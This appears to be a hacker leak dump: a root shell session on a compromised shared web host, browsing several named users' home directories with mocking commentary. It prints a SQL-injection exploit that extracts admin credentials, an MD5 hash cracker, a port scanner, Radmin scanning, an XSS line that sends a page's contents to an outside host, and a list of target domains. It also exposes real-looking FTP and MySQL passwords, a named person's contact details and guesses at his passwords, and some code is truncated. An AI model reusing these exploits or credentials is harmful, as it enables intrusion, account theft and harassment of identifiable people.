Note: the website admin cannot be held responsible for possible abuse of this email script. DISPLAY_FORM; } $send=$_POST['send']; //execute functions if(isset($send)){ send_mail(); } else{ mail_form(); } ?> // Don't piss off nowayout, he _WILL_ bomb your email. sh-3.1# cd ../dictbf sh-3.1# ls -la total 12 drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 . drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 .. -rw-r--r-- 1 infosec infosec 3536 Feb 22 2007 brutepass.php sh-3.1# cat brutepass.php document.getElementById("result").innerHTML="trying - ".$word."""; if ($enc($word) == $hash) { print "Match found! password is $word"; echo ""; exit; } } [snip] // ...If you don't have one tho, he will crack your hash. sh-3.1# cd ../hashcrk sh-3.1# ls -la total 12 drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 . drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 .. -rw-r--r-- 1 infosec infosec 464 Feb 22 2007 index.php sh-3.1# cat index.php $hash="81dc9bdb52d04dc20036dbd8313ed055"; $type="md5"; $words = file("sdict.txt"); // Loop through all words foreach ($words as $word) { $word = rtrim($word); print "trying - ".$word." - ".$type($word)."n
"; if ($type($word) == $hash) { print "Match found! $word = $hashn"; exit; } } print "No matches found!n"; ?> (This code has been tryed and tested, and yes the $type does work. Allowing you to crack md5(), SHA1() and crypt(). I hope you enjoy this!) // We've seen so far a few scripts in PHP. We also saw another PHP script, and another one. Wait a moment... doesn't his CV list all kinds of other languages? Is he a liar or a PHP fanboy? sh-3.1# cd ../logger sh-3.1# ls -la total 16 drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 . drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 .. -rw-r--r-- 1 infosec infosec 380 Feb 22 2007 index.php -rw-rw-rw- 1 infosec infosec 430 Feb 24 2007 logs.html sh-3.1# cat index.php IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); fclose($fp); header ("Location: /index.php"); ?> This will log your ip and cookies:D assh0l3 // XSS Vulnerable cookie logger, while you think you got my cookies.. I am logging yours, assh0l3. sh-3.1# cd ../md5hasher sh-3.1# ls -la total 16 drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 . drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 .. -rw-r--r-- 1 infosec infosec 477 Feb 22 2007 index.html -rw-r--r-- 1 infosec infosec 380 Feb 22 2007 md5er.php sh-3.1# cat md5er.php Untitled Document

Your origional text:

Your md5 hashed text:



// Another vulnerable PHP code.. sh-3.1# cd ../phpscanner sh-3.1# ls -la total 12 drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 . drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 .. -rw-r--r-- 1 infosec infosec 353 Feb 22 2007 index.php sh-3.1# cat index.php
"; $i = $start; $j = $end+1; for($i;$i<$j;$i++) { $fp = @fsockopen($host,$i,&$errno,&$errstr,1); if (!$fp) { echo "Port $i is closed!

"; } else { echo "Port $i is open!

"; } } ?> sh-3.1# cd ~infosec sh-3.1# head domain.txt 1and1.com.cy 24092008ccci.uibs.net 4pilates.net 7sette.com adamides.uibs.net aepiphaniou.com aerokinisi.com aerokinisi.uibs.net akeso.com akeso.gr // Possible targets? sh-3.1# cat host2port.sh #!/bin/sh echo .:: astalavista.com ::. Ips2Port Checker - Written by nowayout for i in `cat hostnames.txt`; do echo Scanning for Remote Administrator Port $i : 4899; nmap -v -sS -P0 -p 4899 $i done // :O sh-3.1# cat host.c /* Date: 04/03/2008 Private Hostname2IP Resolver v1.3 - Custom Edition */ #include #include #include #define TITLE "Hostname2IP Resolver" #define VERSION "1.3" void write_file(char *buf); void banner(); int main(int argc, char *argv[]) { if (argc > 2) { const number_of_hosts = 101; int count; int i; char host[256]; char File_Buf[256]; struct hostent *he; struct in_addr **addr_list; struct in_addr addr; for(count=0;counth_name, inet_ntoa(*(struct in_addr*)he->h_addr)); write_file(File_Buf); } } else { banner(); printf("\n---------------------------------------------\n"); printf("Usage: %s prefix suffix\n",argv[0]); printf("Example: %s cypa no-ip.biz\n",argv[0]); printf("Result: cypa-0.no-ip.biz 69.65.19.125\n"); printf("---------------------------------------------\n\n"); } return 0; } void write_file(char *buf) { FILE *fp=fopen("resolve.txt","a+"); fprintf(fp,"%s\n",buf); fclose(fp); printf("%s\n",buf); } void banner() { fprintf(stderr, "\n%s %s\n", TITLE, VERSION); fprintf(stderr, "astalavista.com\n\n"); } // Private scanner. k? sh-3.1# cat infosecbackup.php sh-3.1# cat infosecbackup.sh #!/bin/bash # Remote FTP Backup Script # Author: Charalambous Glafkos # Contact: glafkos@itsolutionskb.com # Visit: http://www.itsolutionskb.com # Copyright 2008 IT Solutions KB FTPStatus=y HOST='nowayout.no-ip.org' USERNAME='backup' PASSWORD='b4ckup$#' REMOTEDIR=`date +'%d-%m-%Y'` HOSTNAME='/bin/hostname' LOCALDIR='/backups/cpbackup/daily' [snip] // Can someone _please_ tell me what is with Astalavista staff and backup scripts? sh-3.1# cd perl sh-3.1# ls -la total 12 drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 . drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 .. -rw-r--r-- 1 infosec infosec 820 Jun 14 2007 1.pl sh-3.1# cat 1.pl #!/usr/bin/perl -w use LWP::UserAgent; #load the LWP Library for www access die "Example: perl exploit.pl http://www.target.com/\n" unless @ARGV; # if argument null display usage $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; # create new UserAgent from LWP library $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); # define agent as IE7 $host = $ARGV[0] . "low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE userid=1/*"; $res = $b->request(HTTP::Request->new(GET=>$host)); # make the GET request $answer = $res->content; #request if ($answer =~ /raquo; :(.*?):/){ print "\nAdmin User is: $1\n"; } if ($answer =~/([0-9a-fA-F]{32})/){print "\nAdmin Hash : $1\n";} else{print "\n[-] Exploit Failed...\n";} // -_-' sh-3.1# cd .. sh-3.1# head rfibot.pl #!/usr/bin/perl ## # Priv8 ~ Priv8 ~ Priv8 ## # Author: fr1ul^h4ck ## # An A-Team production ## # keep it priv8 ~ keep it priv8 ## # Read the source code, and understand how to use it ;) ## # Use your brain :P !! Don't lame :D ## # Release 1.5 ## # Only for educational purpose. ** ## # NEVER REMOVE THE AUTHOR, AND ** <== ## // LOL. The CEH uses a 'Priv8' RFI bot, hot damn. sh-3.1# cd .sqlier sh-3.1# ls -la total 12 drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 . drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 .. -rw-r--r-- 1 infosec infosec 121 Oct 25 2007 exploits sh-3.1# cat exploits www.articlesitedemo.com YUhSMGNEb3ZMM2QzZHk1aGNuUnBZMnhsYzJsMFpXUmxiVzh1WTI5dEwzTjFZbk5qY21sd2RHbHZiaTV3YUhBPTo6Ojo6Og== sh-3.1# cd .. sh-3.1# head test.c /* Author: Charalambous Glafkos Site: http://www.infosec.org.uk Contact: glafkos@infosec.org.uk Date: 08/03/2008 Title: Hostname2IP Resolver v1.3 */ sh-3.1# cd public_html/ sh-3.1# ls -la total 372 drwxr-x--- 33 infosec nobody 4096 May 9 12:27 . drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 .. drwxr-xr-x 6 infosec infosec 4096 Jun 9 2008 admin drwxrwxr-x 9 infosec infosec 4096 Jun 9 2008 ads drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 cache drwxr-xr-x 2 infosec infosec 4096 Jun 9 2007 cgi-bin drwxr-xr-x 4 infosec infosec 4096 Jul 31 2008 characters drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 config drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 core drwxr-xr-x 17 infosec infosec 4096 Jun 9 2008 core_modules drwxr-xr-x 3 infosec infosec 4096 Jul 31 2008 dataurl -rw-r--r-- 1 infosec infosec 7564 Nov 19 2007 domainsearch.php drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 editor drwxr-xr-x 4 infosec infosec 4096 Jul 31 2008 encoding drwxr-xr-x 11 infosec infosec 4096 Jun 7 22:01 exploits drwxrwxrwx 2 infosec infosec 4096 Dec 18 11:40 feed drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 ffplugin -rw-r--r-- 1 infosec infosec 46801 Oct 21 2008 glafkos_cv_0day.pdf -rw-r--r-- 1 infosec infosec 42392 Feb 20 2008 glafkos_cv.pdf -rw-r--r-- 1 infosec infosec 1571 Oct 26 2007 htaccess -rw-r--r-- 1 infosec infosec 323 Jul 31 2008 .htaccess drwxrwxrwx 11 infosec infosec 4096 Jun 9 2008 images -rw-r--r-- 1 infosec infosec 61356 Sep 26 2007 index.php drwxr-xr-x 6 infosec infosec 4096 Jul 31 2008 ip2country drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 javascripts drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 js drwxr-xr-x 12 infosec infosec 4096 Jun 9 2008 jsthemes drwxr-xr-x 8 infosec infosec 4096 Jun 9 2008 lang drwxr-xr-x 18 infosec infosec 4096 Jun 9 2008 lib drwxr-xr-x 9 infosec infosec 4096 Jul 26 2008 md5 drwxrwxrwx 7 infosec infosec 4096 Jun 9 2008 media drwxr-xr-x 19 infosec infosec 4096 Jun 9 2008 modules -rw-r--r-- 1 infosec infosec 514 Mar 3 2008 nl.txt -rw-r--r-- 1 infosec infosec 328 Mar 22 2007 offline.html -rw-r--r-- 1 infosec infosec 3162 Apr 15 2008 out.sql drwxr-xr-x 3 infosec infosec 4096 Dec 18 12:16 _php drwxr-xr-x 3 infosec infosec 4096 Jul 31 2008 phpfunctions drwxr-xr-x 9 infosec infosec 4096 Jul 31 2008 ports drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 rc -rw-r--r-- 1 infosec infosec 26 Mar 22 2007 robots.txt -rw-r--r-- 1 infosec infosec 3650 Jun 2 2008 rsa_challenge.txt -rwxrwxrwx 1 infosec infosec 8796 Apr 18 2008 sitemap.xml -rw-r--r-- 1 infosec infosec 25401 Nov 19 2007 style.css drwxrwxrwx 4 infosec infosec 4096 Jun 9 2008 themes drwxrwxrwx 3 infosec infosec 4096 Jun 9 2008 tmp drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 toc -rw-r--r-- 1 infosec infosec 5373 Nov 14 2007 whois.php sh-3.1# head index.php // Ok, We understand Glafkos's password theory now... name-of-service$#@!... does that mean his email password is email$#@! or maybe it is gl4fk05$# ;) sh-3.1# cat milupdater.sh #!/bin/bash # Define your options cd /home/infosec/www/exploits WGET="/usr/bin/wget --quiet --timestamping" PHP="/usr/bin/php -q" RM="/bin/rm -Rf" BZIP2="/usr/bin/bzip2 -d" TAR="/bin/tar -xf" CP="/bin/cp -Rf" # Do not touch below these lines if [ -z "${SCRIPTHOME}" ]; then SCRIPTHOME=${HOME}/www/exploits fi if [ -e "${SCRIPTHOME}/sploitlist.txt" ]; then ${RM} ${SCRIPTHOME}/sploitlist.txt fi if [ -e "${SCRIPTHOME}/milw0rm.tar.bz2" ]; then ${RM} ${SCRIPTHOME}/milw0rm* fi ${WGET} -P ${SCRIPTHOME} http://www.milw0rm.com/sploits/milw0rm.tar.bz2 ${BZIP2} ${SCRIPTHOME}/milw0rm.tar.bz2 ${TAR} ${SCRIPTHOME}/milw0rm.tar if [ -d "${SCRIPTHOME}/milw0rm" ]; then ${RM} ${SCRIPTHOME}/platforms ${RM} ${SCRIPTHOME}/rport ${CP} ${SCRIPTHOME}/milw0rm/sploitlist.txt ${SCRIPTHOME}/ ${CP} ${SCRIPTHOME}/milw0rm/sploitlist-bt.txt ${SCRIPTHOME}/ ${CP} ${SCRIPTHOME}/milw0rm/platforms/ ${SCRIPTHOME}/ ${CP} ${SCRIPTHOME}/milw0rm/rport/ ${SCRIPTHOME}/ else echo -n Error: There is no milw0rm directory extracted fi if [ -e "${SCRIPTHOME}/sploitlist.txt" ]; then ${PHP} ${SCRIPTHOME}/DBImport.php else echo -n Error: There is no sploitlist.txt file for importing to the database fi ${RM} ${SCRIPTHOME}/milw0rm.tar* // Let us put it this way for you guys/gals, If you by any means mirror milw0rm / exploits, you are a target and you _will_ be rm'd. only a matter of time. sh-3.1# tail sploitlist.txt ./rport/80/8340.py XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit ./rport/80/8354.py XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ) ./rport/80/8363.py XBMC 8.10 (HEAD) Remote Buffer Overflow Exploit (SEH) ./rport/21/8398.php ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study) ./rport/8000/8421.py Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1] ./rport/8000/8422.py Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2] ./rport/80/8554.py Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit ./rport/21/8716.py httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH) ./rport/21/8732.py httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH) ./rport/2242/8804.py Soulseek 157 NS Remote Buffer Overflow Exploit (SEH) // Oh lawd, he actually saves the exploit with its extension live on his server... "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former." sh-3.1# cd .. sh-3.1# cd md5/ sh-3.1# ls -al total 1168 drwxr-xr-x 9 infosec infosec 4096 Jul 26 2008 . drwxr-x--- 33 infosec nobody 4096 May 9 12:27 .. drwxr-xr-x 3 infosec infosec 4096 Jul 26 2008 admin drwxr-xr-x 4 infosec infosec 4096 Jul 26 2008 ajax -rw-r--r-- 1 infosec infosec 350 Jul 26 2008 conn.php -rw-r--r-- 1 infosec infosec 313 Jul 26 2008 content.php -rw-r--r-- 1 infosec infosec 674 Jul 26 2008 cpanel.php -rw-r--r-- 1 infosec infosec 6837 Jul 26 2008 cracker.php -rw-r--r-- 1 infosec infosec 1265 Jul 26 2008 DbConnector.php drwxr-xr-x 2 infosec infosec 4096 Jul 26 2008 diablo -rw-r--r-- 1 infosec infosec 23 Jul 26 2008 footer.php -rw-r--r-- 1 infosec infosec 14 Jul 26 2008 footertext.php -rw-r--r-- 1 infosec infosec 4096 Jul 26 2008 functions.php -rw-r--r-- 1 infosec infosec 1520 Jul 26 2008 header.php -rw-r--r-- 1 infosec infosec 68 Jul 26 2008 .htaccess drwxr-xr-x 2 infosec infosec 4096 Jul 26 2008 images -rw-r--r-- 1 infosec infosec 30129 Jul 26 2008 index2 -rw-r--r-- 1 infosec infosec 3893 Dec 1 2008 index.php -rw-r--r-- 1 infosec infosec 84 Jul 26 2008 index.php1 -rw-r--r-- 1 infosec infosec 161 Jul 26 2008 index_sample.php -rw-r--r-- 1 infosec infosec 2567 Jul 26 2008 install.php drwxr-xr-x 2 infosec infosec 4096 May 9 12:25 md5 -rw-r--r-- 1 infosec infosec 4317 Jul 26 2008 md5.php -rw-r--r-- 1 infosec infosec 1016335 Jul 26 2008 MD5.rar -rw-r--r-- 1 infosec infosec 754 Jul 26 2008 md5.sql -rw-r--r-- 1 infosec infosec 12032 Jul 26 2008 milw0rm.html drwxr-xr-x 2 infosec infosec 4096 Jul 26 2008 new -rw-r--r-- 1 infosec infosec 1171 Jul 26 2008 proxy.php drwxr-xr-x 3 infosec infosec 4096 Mar 16 18:23 scripts -rw-r--r-- 1 infosec infosec 551 Jul 26 2008 search.php -rw-r--r-- 1 infosec infosec 2345 Jul 26 2008 style.css -rw-r--r-- 1 infosec infosec 309 Jul 26 2008 SystemComponent.php sh-3.1# cat conn.php sh-3.1# cd md5/ sh-3.1# head plaincrack.py #!usr/bin/python #Creates a list of all the cracked md5's #from plain-text.info and writes them to a file. #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com sh-3.1# head dumpcrack1.2.py #!/usr/bin/python #Collects all md5's from a database dump and #attempts to crack them with a wordlist and #milw0rms database. If one is cracked #it will print out the line it was found on. #Options: output format and email address search #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com sh-3.1# head rss.php /usr/local/apache/domlogs/x00mario -rw-r--r-- 1 x00mario x00mario 24 Jan 17 2008 .bash_logout -rw-r--r-- 1 x00mario x00mario 191 Jan 17 2008 .bash_profile -rw-r--r-- 1 x00mario x00mario 124 Jan 17 2008 .bashrc -rw------- 1 x00mario x00mario 0 Jan 17 2008 .contactemail drwx------ 5 x00mario x00mario 4096 Jun 10 2008 .cpanel -rw-r----- 1 x00mario x00mario 1 Jan 15 01:03 cpbackup-exclude.conf drwxr-xr-x 3 x00mario x00mario 4096 Jul 25 2008 cpmove.psql -rw-r--r-- 1 x00mario x00mario 6 Jul 29 2008 .dns -rw-r--r-- 1 x00mario x00mario 383 Jan 17 2008 .emacs drwxr-x--- 3 x00mario mail 4096 Jun 10 2008 etc -rw------- 1 x00mario x00mario 13 May 27 00:04 .ftpquota drwxr-x--- 2 x00mario nobody 4096 Jul 25 2008 .htpasswds -rw-r--r-- 1 x00mario x00mario 7 Jul 25 2008 .lang -rw------- 1 x00mario x00mario 13 Apr 21 2008 .lastlogin drwxrwx--- 7 x00mario x00mario 4096 Jul 25 2008 mail drwxr-xr-x 3 x00mario x00mario 4096 Jul 25 2008 public_ftp drwxr-x--- 11 x00mario nobody 4096 Feb 15 15:08 public_html drwxr-xr-x 7 x00mario x00mario 4096 Sep 24 2008 tmp drwx------ 2 x00mario x00mario 4096 Jan 21 2008 .trash lrwxrwxrwx 1 x00mario x00mario 11 Jul 25 2008 www -> public_html -rw-r--r-- 1 x00mario x00mario 658 Jul 25 2008 .zshrc sh-3.1# cd www sh-3.1# ls -la total 372 drwxr-x--- 11 x00mario nobody 4096 Feb 15 15:08 . drwx--x--x 11 x00mario x00mario 4096 Feb 16 17:24 .. drwxr-xr-x 3 x00mario x00mario 4096 May 23 12:41 0x.lv -rw-r--r-- 1 x00mario x00mario 1956 Jan 21 2008 1446883a7480.html -rw-r--r-- 1 x00mario x00mario 257 Feb 15 15:08 almost_owned -rw-r--r-- 1 x00mario x00mario 468 Jan 21 2008 anonymous_array.php drwxr-xr-x 2 x00mario x00mario 4096 Jan 17 2008 cgi-bin drwxr-xr-x 3 x00mario x00mario 4096 Oct 19 2008 characters -rw-r--r-- 1 x00mario x00mario 21472 Jan 21 2008 c.js -rw-r--r-- 1 x00mario x00mario 21472 Jan 21 2008 C.JS drwxr-xr-x 2 x00mario x00mario 4096 Oct 19 2008 datauri drwxr-xr-x 2 x00mario x00mario 4096 Oct 19 2008 dataurl -rw-r--r-- 1 x00mario x00mario 263 Jan 21 2008 distributor.php drwxr-xr-x 3 x00mario x00mario 4096 May 21 08:27 encoding -rw-r--r-- 1 x00mario x00mario 2274 Jan 21 2008 favicon.ico -rw-r--r-- 1 x00mario x00mario 523 Apr 9 2008 .htaccess -rw-r--r-- 1 x00mario x00mario 43 Jan 21 2008 i.html -rw-r--r-- 1 x00mario x00mario 21369 Jan 21 2008 i.js -rw-r--r-- 1 x00mario x00mario 21377 Jan 21 2008 I.JS -rw-r--r-- 1 x00mario x00mario 21586 Oct 21 2008 j.js -rw-r--r-- 1 x00mario x00mario 21395 Jan 21 2008 J.JS drwxr-xr-x 4 x00mario x00mario 4096 Jun 10 2008 kishor drwxr-xr-x 5 x00mario x00mario 4096 Jun 10 2008 lockr drwxr-xr-x 3 x00mario x00mario 4096 Nov 24 2008 mailgun -rw-r--r-- 1 x00mario x00mario 309 Jan 21 2008 mozxssc.xml -rw-r--r-- 1 x00mario x00mario 310 Feb 8 2008 mozxsspc.xml -rw-r--r-- 1 x00mario x00mario 309 Jan 21 2008 mozxss.xml -rw-r--r-- 1 x00mario x00mario 21434 Feb 8 2008 pc.js -rw-r--r-- 1 x00mario x00mario 21416 Jan 21 2008 p.js -rw-r--r-- 1 x00mario x00mario 7846 Jan 21 2008 vectors -rw-r--r-- 1 x00mario x00mario 21472 Jan 21 2008 x.js -rw-r--r-- 1 x00mario x00mario 29522 Oct 20 2008 xss-assistant.user.js -rw-r--r-- 1 x00mario x00mario 133 Jan 30 2008 xss.htc -rw-r--r-- 1 x00mario x00mario 5614 Oct 20 2008 xss_post_forwarder.php -rw-r--r-- 1 x00mario x00mario 18401 Oct 20 2008 xss.xml sh-3.1# cat almost_owned This file is part of an experiment proving the dangers of invisible text inside BBCode tags. There's no real vector or backdoor or comparable - just this text file as a proof of concept. Feel free to contact x00mario@gmail.com if you wish to know more. // BBCode invisible tags are dangerous, run! sh-3.1# cd 0x.lv sh-3.1# ls -la total 40 drwxr-xr-x 3 x00mario x00mario 4096 May 23 12:41 . drwxr-x--- 11 x00mario nobody 4096 Feb 15 15:08 .. drwxr-xr-x 2 x00mario x00mario 4096 Feb 13 2008 cgi-bin -rw-r--r-- 1 x00mario x00mario 95 Feb 13 2008 index.html -rw-r--r-- 1 x00mario x00mario 509 Mar 31 2008 l.php -rw-r--r-- 1 x00mario x00mario 211 May 23 12:41 mozxss.xml -rw-r--r-- 1 x00mario x00mario 56 May 23 12:41 test.css -rw-r--r-- 1 x00mario x00mario 204 May 23 08:44 w2.xml -rw-r--r-- 1 x00mario x00mario 4834 May 23 08:45 w3.xml sh-3.1# cat l.php var img = document.createElement('IMG'); img.src = 'http://0x.lv/l.php?dom=' + escape(document.firstChild.innerHTML); img.style.visibility = 'hidden'; document.firstChild.appendChild(img); // Nothing interesting, moving on.. sh-3.1# cd ~itkb sh-3.1# ls -la total 172176 drwx--x--x 14 itkb itkb 4096 Jun 9 00:59 . drwxr-xr-x 43 root root 4096 Jun 9 00:20 .. lrwxrwxrwx 1 itkb itkb 30 Jan 28 06:11 access-logs -> /usr/local/apache/domlogs/itkb -rw------- 1 itkb itkb 176000180 Jun 3 00:23 backup-6.3.2009_00-05-06_itkb.tar.gz -rw------- 1 itkb itkb 14561 Jun 8 08:45 .bash_history -rw-r--r-- 1 itkb itkb 24 Oct 24 2008 .bash_logout -rw-r--r-- 1 itkb itkb 176 Oct 24 2008 .bash_profile -rw-r--r-- 1 itkb itkb 124 Oct 24 2008 .bashrc -rw------- 1 itkb itkb 22 May 17 06:16 .contactemail drwxr-xr-x 5 itkb itkb 4096 Nov 20 2008 .cpanel -rw-r----- 1 itkb itkb 1 Jan 15 00:05 cpbackup-exclude.conf drwxr-xr-x 3 itkb itkb 4096 Jan 28 06:11 cpmove.psql -rw-r--r-- 1 itkb itkb 17 Jun 8 11:41 .dns -rw-r--r-- 1 itkb itkb 2336 Jun 5 00:07 error_log drwxr-x--- 3 itkb mail 4096 Jan 28 06:11 etc drwx------ 2 itkb itkb 4096 Nov 27 2008 .gnupg drwxr-x--- 3 itkb nobody 4096 Dec 1 2008 .htpasswds -rw-r--rw- 1 itkb itkb 2035 Mar 19 05:55 itkbbackup.php -rw-r--r-- 1 itkb itkb 7 Oct 24 2008 .lang -rw------- 1 itkb itkb 14 Apr 23 18:03 .lastlogin -rw------- 1 itkb itkb 35 Nov 14 2008 .lesshst drwxrwx--- 7 itkb itkb 4096 May 27 21:11 mail drwxr-xr-x 3 itkb itkb 4096 Apr 22 16:25 psd drwxr-xr-x 3 itkb itkb 4096 Jul 25 2008 public_ftp drwxr-xr-x 9 itkb nobody 4096 Jun 5 03:51 public_html -rw------- 1 itkb itkb 1024 Oct 25 2008 .rnd drwx------ 4 itkb itkb 4096 Nov 27 2008 ssl drwxr-xr-x 7 itkb itkb 4096 Nov 20 2008 tmp drwxr-xrwx 2 itkb itkb 4096 Nov 26 2008 wpau-backup lrwxrwxrwx 1 itkb itkb 11 Jan 28 06:11 www -> public_html -rw-r--r-- 1 itkb itkb 658 Oct 24 2008 .zshrc sh-3.1# cd public_html sh-3.1# ls -la total 2312 drwxr-xr-x 9 itkb nobody 4096 Jun 5 03:51 . drwx--x--x 14 itkb itkb 4096 Jun 9 00:59 .. drwxr-xr-x 2 itkb itkb 4096 Jun 5 03:52 ads drwxr-xr-x 2 itkb itkb 4096 Apr 15 22:13 certified drwxr-xr-x 2 itkb itkb 4096 Oct 24 2008 cgi-bin -rw-r--r-- 1 nobody nobody 1240873 Jun 4 10:19 error_log -rw-r--r-- 1 itkb itkb 7888 Oct 31 2008 fd.js -rw-r--r-- 1 itkb itkb 1517 Nov 6 2008 .htaccess -rw-r--r-- 1 itkb itkb 397 Mar 19 06:45 index.php -rw-r--r-- 1 nobody nobody 397 Mar 19 06:45 index.php.wpau.bak -rw-r--r-- 1 itkb itkb 3429 Apr 15 20:40 itsolutionskb_link.png -rw-r--r-- 1 itkb itkb 15410 Mar 19 06:45 license.txt -rw-r--r-- 1 root root 410 Jun 4 10:49 nmap.txt -rw-r--r-- 1 nobody nobody 7638 Mar 19 06:45 readme.html -rw-r--r-- 1 itkb itkb 106 Nov 1 2008 robots.txt -rwxrwxrwx 1 itkb itkb 647199 May 28 06:04 sitemap.xml -rwxrwxrwx 1 itkb itkb 22804 May 28 06:04 sitemap.xml.gz -rw-r--r-- 1 itkb itkb 89589 Oct 31 2008 slideshow.swf -rw-r--r-- 1 itkb itkb 2297 May 6 08:02 slideshow.xml drwxr-xr-x 7 itkb itkb 4096 Dec 11 04:49 wp-admin -rw-r--r-- 1 itkb itkb 40271 Mar 19 06:45 wp-app.php -rw-r--r-- 1 itkb itkb 220 Mar 19 06:45 wp-atom.php drwxr-xrwx 2 itkb itkb 4096 Mar 19 06:47 wpau-backup -rw-r--r-- 1 itkb itkb 274 Mar 19 06:45 wp-blog-header.php -rw-r--r-- 1 itkb itkb 3424 Mar 19 06:45 wp-comments-post.php -rw-r--r-- 1 itkb itkb 238 Mar 19 06:45 wp-commentsrss2.php -rw-r--r-- 1 itkb itkb 1645 Dec 4 2008 wp-config.php drwxr-xr-x 10 itkb itkb 4096 Apr 29 04:29 wp-content -rw-r--r-- 1 itkb itkb 1242 Mar 19 06:45 wp-cron.php -rw-r--r-- 1 itkb itkb 220 Mar 19 06:45 wp-feed.php drwxr-xr-x 5 itkb itkb 4096 Dec 11 04:49 wp-includes -rw-r--r-- 1 itkb itkb 1986 Mar 19 06:45 wp-links-opml.php -rw-r--r-- 1 itkb itkb 2004 Mar 19 06:45 wp-load.php -rw-r--r-- 1 itkb itkb 19738 Mar 19 06:45 wp-login.php -rw-r--r-- 1 itkb itkb 6932 Mar 19 06:45 wp-mail.php -rw-r--r-- 1 itkb itkb 487 Mar 19 06:45 wp-pass.php -rw-r--r-- 1 itkb itkb 218 Mar 19 06:45 wp-rdf.php -rw-r--r-- 1 itkb itkb 316 Mar 19 06:45 wp-register.php -rw-r--r-- 1 itkb itkb 220 Mar 19 06:45 wp-rss2.php -rw-r--r-- 1 itkb itkb 218 Mar 19 06:45 wp-rss.php -rw-r--r-- 1 itkb itkb 18695 Mar 19 06:45 wp-settings.php -rw-r--r-- 1 itkb itkb 3434 Mar 19 06:45 wp-trackback.php -rw-r--r-- 1 itkb itkb 92428 Mar 19 06:45 xmlrpc.php sh-3.1# cat wp-config.php /usr/local/apache/domlogs/ryb -rw-r--r-- 1 ryb ryb 190 Feb 8 2006 .addon-installlog -rw------- 1 ryb ryb 20 Feb 8 2006 .addonscgi-phpBB -rw-r--r-- 1 ryb ryb 11242 May 9 12:20 .bash_history -rw-r--r-- 1 ryb ryb 304 Nov 18 2005 .bash_logout -rw-r--r-- 1 ryb ryb 191 Nov 18 2005 .bash_profile -rw-r--r-- 1 ryb ryb 124 Nov 18 2005 .bashrc drwx------ 3 ryb ryb 4096 Jun 16 2008 .bittorrent -rw------- 1 ryb ryb 0 Nov 18 2005 .contactemail drwxr-xr-x 3 ryb ryb 4096 Jun 16 2008 .cpaddons -rw-r--r-- 1 ryb ryb 0 Oct 11 2006 .cpaddons_notify drwxr-xr-x 4 ryb ryb 4096 Aug 12 2008 .cpanel -rw------- 1 ryb ryb 5977 Jul 26 2004 .cpanel-ducache -rw-r----- 1 ryb ryb 1 Jan 15 01:03 cpbackup-exclude.conf drwxr-xr-x 3 ryb ryb 4096 Jul 26 2008 cpmove.psql -rw-r--r-- 1 ryb ryb 15 May 9 12:15 .dns -rw-r--r-- 1 ryb ryb 383 Nov 18 2005 .emacs drwxr-x--- 3 ryb mail 4096 Jun 16 2008 etc -rw-r--r-- 1 ryb ryb 47 Feb 14 2005 file -rw------- 1 ryb ryb 17 May 27 00:04 .ftpquota drwxr-x--- 4 ryb nobody 4096 Jun 16 2008 .htpasswds -rw-r--r-- 1 ryb ryb 7 Jul 26 2008 .lang -rw------- 1 ryb ryb 13 Jul 12 2007 .lastlogin drwx------ 2 ryb ryb 4096 Aug 11 2007 logs drwxrwx--- 10 ryb ryb 4096 May 30 10:19 mail -rwx------ 1 ryb ryb 32 Jun 29 2004 .my.cnf drwx------ 3 ryb ryb 4096 Jun 16 2008 .neomail drwx------ 3 ryb ryb 4096 Jun 16 2008 .neomail-nowayout -rwx------ 1 ryb ryb 44893 Nov 18 2005 pkgacct drwxr-xr-x 3 ryb ryb 4096 Jul 26 2008 public_ftp drwxr-x--- 31 ryb nobody 4096 May 9 12:19 public_html drwx------ 2 ryb ryb 4096 Jul 3 2004 .ssh drwx------ 8 ryb ryb 4096 Sep 24 2008 tmp drwxr-xr-x 2 ryb ryb 4096 Jan 25 2006 .tmp drwx------ 2 ryb ryb 4096 Dec 15 2004 .trash lrwxrwxrwx 1 ryb ryb 11 Jul 26 2008 www -> public_html -rw-r--r-- 1 ryb ryb 658 Jul 26 2008 .zshrc // This is rootyourbox.org, oh the lulz. sh-3.1# cat .my.cnf [client] user=ryb pass=si060482 // Same password from astalavista.net database. mmmm sh-3.1# cd public_html sh-3.1# ls -la total 3696 drwxr-x--- 31 ryb nobody 4096 May 9 12:19 . drwx--x--x 